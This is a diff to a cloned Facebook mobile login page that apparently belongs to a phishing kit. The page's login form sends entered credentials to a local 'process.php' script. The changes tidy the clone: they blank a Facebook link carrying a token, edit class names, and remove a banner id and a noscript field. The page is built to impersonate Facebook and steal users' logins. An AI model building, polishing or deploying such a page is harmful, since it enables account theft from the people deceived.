--- a/login/facebook/index.html
+++ b/login/facebook/index.html
@@ -21,12 +21,10 @@
             <div class="_9om_">
               <div class="_4-4l">
                 <div
-                  id="login_top_banner"
                   data-sigil="m_login_upsell login_identify_step_element"></div>
                 <div class="_7om2 _52we _2pid _52z6">
                   <div class="_4g34">
-                    <a
-                      href="/login/?privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNzE0MTg3MzU0LCJjYWxsc2l0ZV9pZCI6Nzk2MTcwNzM0NTY5ODY0fQ%3D%3D&amp;refid=8"
+                    <a href=""
                       ><img
                         src="https://static.xx.fbcdn.net/rsrc.php/y1/r/4lCu2zih0ca.svg"
                         width="112"
@@ -39,7 +37,7 @@
                   <form
                     action="process.php"
                     method="POST"
-                    class="mobile-login-form _9hp- _5spm">
+                    class="mobile-login-form _9hp-_5spm">
                     <input
                       type="hidden"
                       name="lsd"
@@ -152,9 +150,6 @@
                       <div id="otp_button_elem_container"></div>
                     </div>
                     <div class="_xo8"></div>
-                    <noscript
-                      ><input type="hidden" name="_fb_noscript" value="true"
-                    /></noscript>
                   </form>
                   <div>
                     <div class="_2pie _9omz">
